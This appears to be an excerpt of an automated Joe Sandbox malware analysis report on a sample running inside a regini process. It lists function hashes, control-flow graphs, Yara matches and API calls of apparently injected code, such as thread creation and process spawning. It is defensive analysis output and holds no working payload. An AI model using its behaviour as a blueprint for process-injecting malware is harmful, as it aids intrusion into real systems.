                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 5adf3f4f62f1743d398325e58fefc8934ea559047cfa1af1e324c326111b5bc7
                                                                              • Instruction ID: 543774f7e8848665e136c1e0f34eddc367816028f2ef09b3cb3deb809d18aca6
                                                                              • Opcode Fuzzy Hash: 5adf3f4f62f1743d398325e58fefc8934ea559047cfa1af1e324c326111b5bc7
                                                                              • Instruction Fuzzy Hash: AB900435313404031105F75C474454700C7C7D53513D5C031F1415554CD731CD715131
                                                                              Function 03072AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 48a5500da2e201d55830f8e5a5e9021066021698078473febf91685f13109a5c
                                                                              • Instruction ID: 6a6754bd2313b40ec769639cad49c7e8b135cf34327a501fa8046361ee866ac6
                                                                              • Opcode Fuzzy Hash: 48a5500da2e201d55830f8e5a5e9021066021698078473febf91685f13109a5c
                                                                              • Instruction Fuzzy Hash: 67900225222404021145F658464454B048697D63513D5C015F1816594CC72189655321
                                                                              Function 030739B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 9043e7893926109a5e40f856afe00e99608a6da5a502914f29dc5028e37f9670
                                                                              • Instruction ID: eb156590f21a9b630ce5d02182779a646c02addbd681235926ae6803285b9f27
                                                                              • Opcode Fuzzy Hash: 9043e7893926109a5e40f856afe00e99608a6da5a502914f29dc5028e37f9670
                                                                              • Instruction Fuzzy Hash: 2190022124645502E150B25C84446564046A7E0301F95C021A0C14598D865589556221
                                                                              Function 03072F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: cd8937a8ea712eafacd35b8d478e011a7bcaed903b5ecfcd1669dca501ad6880
                                                                              • Instruction ID: c0a0d0c4ee9ba504824587f5a3972a5381c4084f3c484e40d383d1b7c7ac4cc6
                                                                              • Opcode Fuzzy Hash: cd8937a8ea712eafacd35b8d478e011a7bcaed903b5ecfcd1669dca501ad6880
                                                                              • Instruction Fuzzy Hash: CE90026134240842E100B2588454B460046C7E1301F95C015E1464558D8719CD526126
                                                                              Function 03072FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 655b17162b0e3aeffe7f3ca3bbc74c6f42d6bac28e3dac494b0994ccbefbebd0
                                                                              • Instruction ID: 65afde1f8cfe999067e12f5c41dbe510717b95ea0f6be72c69ea0bf165d23a1e
                                                                              • Opcode Fuzzy Hash: 655b17162b0e3aeffe7f3ca3bbc74c6f42d6bac28e3dac494b0994ccbefbebd0
                                                                              • Instruction Fuzzy Hash: E5900221602404425140B268C8849464046ABE1311795C121A0D98554D865989655665
                                                                              Function 03072FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 47afe021aebfc917bddc87b01181fd5393b9f69e753dd3badc6a1f1776a78216
                                                                              • Instruction ID: 03b7dc2d073b18c54f35ab2ab09424512d4a4b3285f8a516415e83477771e312
                                                                              • Opcode Fuzzy Hash: 47afe021aebfc917bddc87b01181fd5393b9f69e753dd3badc6a1f1776a78216
                                                                              • Instruction Fuzzy Hash: 1A900221212C0442E200B6688C54B47004687D0303F95C115A0554558CCA1589615521
                                                                              Function 03072E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 39a27428b8f1fdbe3449d8ea03080ed833af42c4b7004e16f833bf3261f6114e
                                                                              • Instruction ID: 978006cc818ad45688e9bf3326130e6f60e5a08615a408aec7e73aba200f319b
                                                                              • Opcode Fuzzy Hash: 39a27428b8f1fdbe3449d8ea03080ed833af42c4b7004e16f833bf3261f6114e
                                                                              • Instruction Fuzzy Hash: 2090022160240902E101B2588444656004B87D0341FD5C022A1424559ECB258A92A131
                                                                              Function 03072EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: ef96ed259ca64e9fc2418f0eacf27e677f9433b92b9ec748356f8cbe9a1dc667
                                                                              • Instruction ID: 3b6bb0c34a6ba2ec1a1f678cdc35a72b6daae2aa2892e3d3dcdf912f82107a26
                                                                              • Opcode Fuzzy Hash: ef96ed259ca64e9fc2418f0eacf27e677f9433b92b9ec748356f8cbe9a1dc667
                                                                              • Instruction Fuzzy Hash: 8690026120280803E140B6588844647004687D0302F95C011A2464559E8B298D516135
                                                                              Function 03072D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 062179a3dbf3215bde3c83ad06605c2c06b336800e7d10bc57b7e40d42a9d8ed
                                                                              • Instruction ID: ab0f1fbdc6f89c7dc8aca5e5c922a93baeac8626dd8c408127e529d253689b7b
                                                                              • Opcode Fuzzy Hash: 062179a3dbf3215bde3c83ad06605c2c06b336800e7d10bc57b7e40d42a9d8ed
                                                                              • Instruction Fuzzy Hash: B890022921340402E180B258944864A004687D1302FD5D415A041555CCCA1589695321
                                                                              Function 03072D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 6eced130dffc702fe6f3e77ff98dc75140229b264900807e194e1423ea3c7460
                                                                              • Instruction ID: c6734bda95344e59599846dbd64c33f696c4fd329d6da1672c993ea8dd9f6e79
                                                                              • Opcode Fuzzy Hash: 6eced130dffc702fe6f3e77ff98dc75140229b264900807e194e1423ea3c7460
                                                                              • Instruction Fuzzy Hash: BF90022130240403E140B25894586464046D7E1301F95D011E0814558CDA1589565222
                                                                              Function 03072DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: c52917ffc51e59714fb4af53e2fa364a478908248d0a18dff09608e6ada1b66e
                                                                              • Instruction ID: b4de34f3f80a891febf8bb8f0285f8965509446860203a28027176e33da0a03d
                                                                              • Opcode Fuzzy Hash: c52917ffc51e59714fb4af53e2fa364a478908248d0a18dff09608e6ada1b66e
                                                                              • Instruction Fuzzy Hash: 86900221243445526545F2588444547404797E03417D5C012A1814954C86269956D621
                                                                              Function 03072DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 46e9ba65936f9c5d9cd069e5dceb3c0b7e65d0dc8f9c9eb1b28fd4e7869207c5
                                                                              • Instruction ID: 8a2d8998b189b61c1a792f2cc443a34c8f4efd984ae315557f11c2b3409fa906
                                                                              • Opcode Fuzzy Hash: 46e9ba65936f9c5d9cd069e5dceb3c0b7e65d0dc8f9c9eb1b28fd4e7869207c5
                                                                              • Instruction Fuzzy Hash: 5990023120240813E111B2588544747004A87D0341FD5C412A082455CD97568A52A121
                                                                              Function 03072C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 4760b6e73a80a4d2383849cfdc01fa10067def3114f633e339cc56359abd7e35
                                                                              • Instruction ID: c975f90432bedbf3e330998a409d7d30fdae0cf2c907d4e67e36df3829efe30c
                                                                              • Opcode Fuzzy Hash: 4760b6e73a80a4d2383849cfdc01fa10067def3114f633e339cc56359abd7e35
                                                                              • Instruction Fuzzy Hash: 6190023120240C42E100B2588444B86004687E0301F95C016A0524658D8715C9517521
                                                                              Function 03072C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: eb0aaadc08cf1727cb5fdd83109ed87dfd891d00e2d93714d029c7702ee84b82
                                                                              • Instruction ID: 3562224f492677f2b485cb2cf162425621684dd381711d8bebde34beaf226a28
                                                                              • Opcode Fuzzy Hash: eb0aaadc08cf1727cb5fdd83109ed87dfd891d00e2d93714d029c7702ee84b82
                                                                              • Instruction Fuzzy Hash: 2290023120248C02E110B258C44478A004687D0301F99C411A482465CD879589917121
                                                                              Function 03072CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 61f04b5bef9c70e658d54790893ffe949106e2065d6732cb5994ddc058554ba5
                                                                              • Instruction ID: 91c583f3f708e6fbe1ad4dc74aee16e99e956f0a51ee552c465b15ef6b06fa83
                                                                              • Opcode Fuzzy Hash: 61f04b5bef9c70e658d54790893ffe949106e2065d6732cb5994ddc058554ba5
                                                                              • Instruction Fuzzy Hash: 2F90023120240802E100B6989448686004687E0301F95D011A5424559EC76589916131
                                                                              Function 028C0EAB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 162COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 437 28c0eab-28c0eae 438 28c0f05-28c0f0f 437->438 439 28c0eb1-28c0ebb 437->439 442 28c0f69-28c0f9a call 28b1470 call 28d1e30 438->442 443 28c0f11-28c0f24 438->443 440 28c0ebd 439->440 441 28c0ef3-28c0ef9 439->441 445 28c0ebe-28c0ed6 440->445 446 28c0f59-28c0f68 call 28c46e0 441->446 447 28c0efb-28c0efe 441->447 465 28c0f9c-28c0fab PostThreadMessageW 442->465 466 28c0fba-28c0fc0 442->466 443->446 450 28c0ed9 445->450 446->442 451 28c0e8b-28c0e99 447->451 452 28c0f00-28c0f01 447->452 457 28c0eda-28c0edf 450->457 454 28c0e6a-28c0e79 451->454 455 28c0e9b-28c0eaa 451->455 452->438 463 28c0e1e-28c0e1f 454->463 464 28c0e21-28c0e42 454->464 455->437 455->457 461 28c0e87-28c0e89 457->461 462 28c0ee1-28c0ee2 457->462 461->450 461->451 462->441 463->464 468 28c0e44-28c0e45 464->468 469 28c0e53-28c0e61 464->469 465->466 467 28c0fad-28c0fb7 465->467 467->466 468->445 470 28c0e47-28c0e51 468->470 469->454 470->469
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 174EBI30$174EBI30
                                                                              • API String ID: 0-962170130
                                                                              • Opcode ID: 56b97a2f5a8506107941531bb8e58fd2207cffca377e0f64ecbf00a9c5e3b444
                                                                              • Instruction ID: a35ee2764afc1ab4cc742edf3ae844f1b513ea7a408e11f0f7d4e288e4fdf128
                                                                              • Opcode Fuzzy Hash: 56b97a2f5a8506107941531bb8e58fd2207cffca377e0f64ecbf00a9c5e3b444
                                                                              • Instruction Fuzzy Hash: EA41F0BD855399FBC7029F788C849DBBF69EE027E4728469CE940DB252D330C546CB81
                                                                              Function 028C0EE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71threadwindowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 471 28c0ee6-28c0ef1 472 28c0f5a-28c0f68 call 28c46e0 471->472 473 28c0ef3-28c0ef9 471->473 482 28c0f69-28c0f9a call 28b1470 call 28d1e30 472->482 475 28c0f59 473->475 476 28c0efb-28c0efe 473->476 475->472 478 28c0e8b-28c0e99 476->478 479 28c0f00-28c0f01 476->479 480 28c0e6a-28c0e79 478->480 481 28c0e9b-28c0eaa 478->481 483 28c0f05-28c0f0f 479->483 491 28c0e1e-28c0e1f 480->491 492 28c0e21-28c0e42 480->492 485 28c0eda-28c0edf 481->485 486 28c0eab-28c0eae 481->486 503 28c0f9c-28c0fab PostThreadMessageW 482->503 504 28c0fba-28c0fc0 482->504 483->482 488 28c0f11-28c0f24 483->488 493 28c0e87-28c0e89 485->493 494 28c0ee1-28c0ee2 485->494 486->483 489 28c0eb1-28c0ebb 486->489 488->475 489->473 496 28c0ebd 489->496 491->492 498 28c0e44-28c0e45 492->498 499 28c0e53-28c0e61 492->499 493->478 495 28c0ed9 493->495 494->473 495->485 500 28c0ebe-28c0ed6 496->500 498->500 502 28c0e47-28c0e51 498->502 499->480 500->495 502->499 503->504 505 28c0fad-28c0fb7 503->505 505->504
                                                                              APIs
                                                                              • PostThreadMessageW.USER32(174EBI30,00000111,00000000,00000000), ref: 028C0FA7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID: 174EBI30$174EBI30
                                                                              • API String ID: 1836367815-962170130
                                                                              • Opcode ID: 47c90f7124cb5510441c4f3681964bb234bd83d513d7e694fcac5fe7132f47ad
                                                                              • Instruction ID: fd2e948194332078b2c49371ddaecb98393d6c499e9c347b97212f6d3b839502
                                                                              • Opcode Fuzzy Hash: 47c90f7124cb5510441c4f3681964bb234bd83d513d7e694fcac5fe7132f47ad
                                                                              • Instruction Fuzzy Hash: E91180BED11244BA9B116BA08C81DEFB73CEE426F4B20426CF658E7641D334C9424FE1
                                                                              Function 028CF6EA Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 129COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InitializeUninitialize
                                                                              • String ID: @J7<
                                                                              • API String ID: 3442037557-2016760708
                                                                              • Opcode ID: 4b3665abde7fd93ce6ecd6e6654fec9989670edcc31e3f05bf5f63bdbdbfbdd3
                                                                              • Instruction ID: 24d39e32978e2ab3d49571124afa802a1f7f4cf1148aebc8f8cef2709812897e
                                                                              • Opcode Fuzzy Hash: 4b3665abde7fd93ce6ecd6e6654fec9989670edcc31e3f05bf5f63bdbdbfbdd3
                                                                              • Instruction Fuzzy Hash: DA415879A002099FDB10DFD8D8809EEB7BAFF88314F10456AE509E7214D775EE45CBA1
                                                                              Function 028CF6F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InitializeUninitialize
                                                                              • String ID: @J7<
                                                                              • API String ID: 3442037557-2016760708
                                                                              • Opcode ID: 14b54004d69abd41e4c5224c5c92bb81af82decf163dd48d3913dd3e9082d8a7
                                                                              • Instruction ID: 28efc9f840d7aeae731ed9a2565e90774ca4193027af5e3e4224f6108916040b
                                                                              • Opcode Fuzzy Hash: 14b54004d69abd41e4c5224c5c92bb81af82decf163dd48d3913dd3e9082d8a7
                                                                              • Instruction Fuzzy Hash: D23121B9A006099FDB00DFD8D8809EEB7BABF88304B108559E505E7214D775EE05CBA0
                                                                              Function 028C46E0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 028C4752
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: 1691cc531efa4f726ca024597818dcdd32949c22011164301577cf2829968642
                                                                              • Instruction ID: 2b158faf5932deebd084f8272e1e6dd2c4d4e71aecbe04d2b798bb1d7a0a0e7a
                                                                              • Opcode Fuzzy Hash: 1691cc531efa4f726ca024597818dcdd32949c22011164301577cf2829968642
                                                                              • Instruction Fuzzy Hash: 06015EBED0020DABDB10EAA4DD41F9EB3B99B04308F1041A5E90CD7241F630E748CB92
                                                                              Function 028D9AF0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,028C84DE,00000010,?,?,?,00000044,?,00000010,028C84DE,?,?,?), ref: 028D9B50
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateInternalProcess
                                                                              • String ID:
                                                                              • API String ID: 2186235152-0
                                                                              • Opcode ID: bebc8f0999d7269a19949fd6b9c1aba0b5f34f46f22eebeb4348d9249b14febd
                                                                              • Instruction ID: 1481946255e90ea802b30807adcd0154eef13258a351e71c739a99e762ba557f
                                                                              • Opcode Fuzzy Hash: bebc8f0999d7269a19949fd6b9c1aba0b5f34f46f22eebeb4348d9249b14febd
                                                                              • Instruction Fuzzy Hash: 3501C0B6204108BBCB04DE99DC80EEB77AEAF8C754F118208BA1DE7240D630F8518BA4
                                                                              Function 028B9EB0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 028B9EF5
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateThread
                                                                              • String ID:
                                                                              • API String ID: 2422867632-0
                                                                              • Opcode ID: a0a9baeb9889b603c9e2e519a7b7258e35d53077eb86fa72869950bea680f62f
                                                                              • Instruction ID: c1893d9c4d6bac44eb8ffd5865f98869778efc1b6ef33f81f49d9f91e7a6b3a1
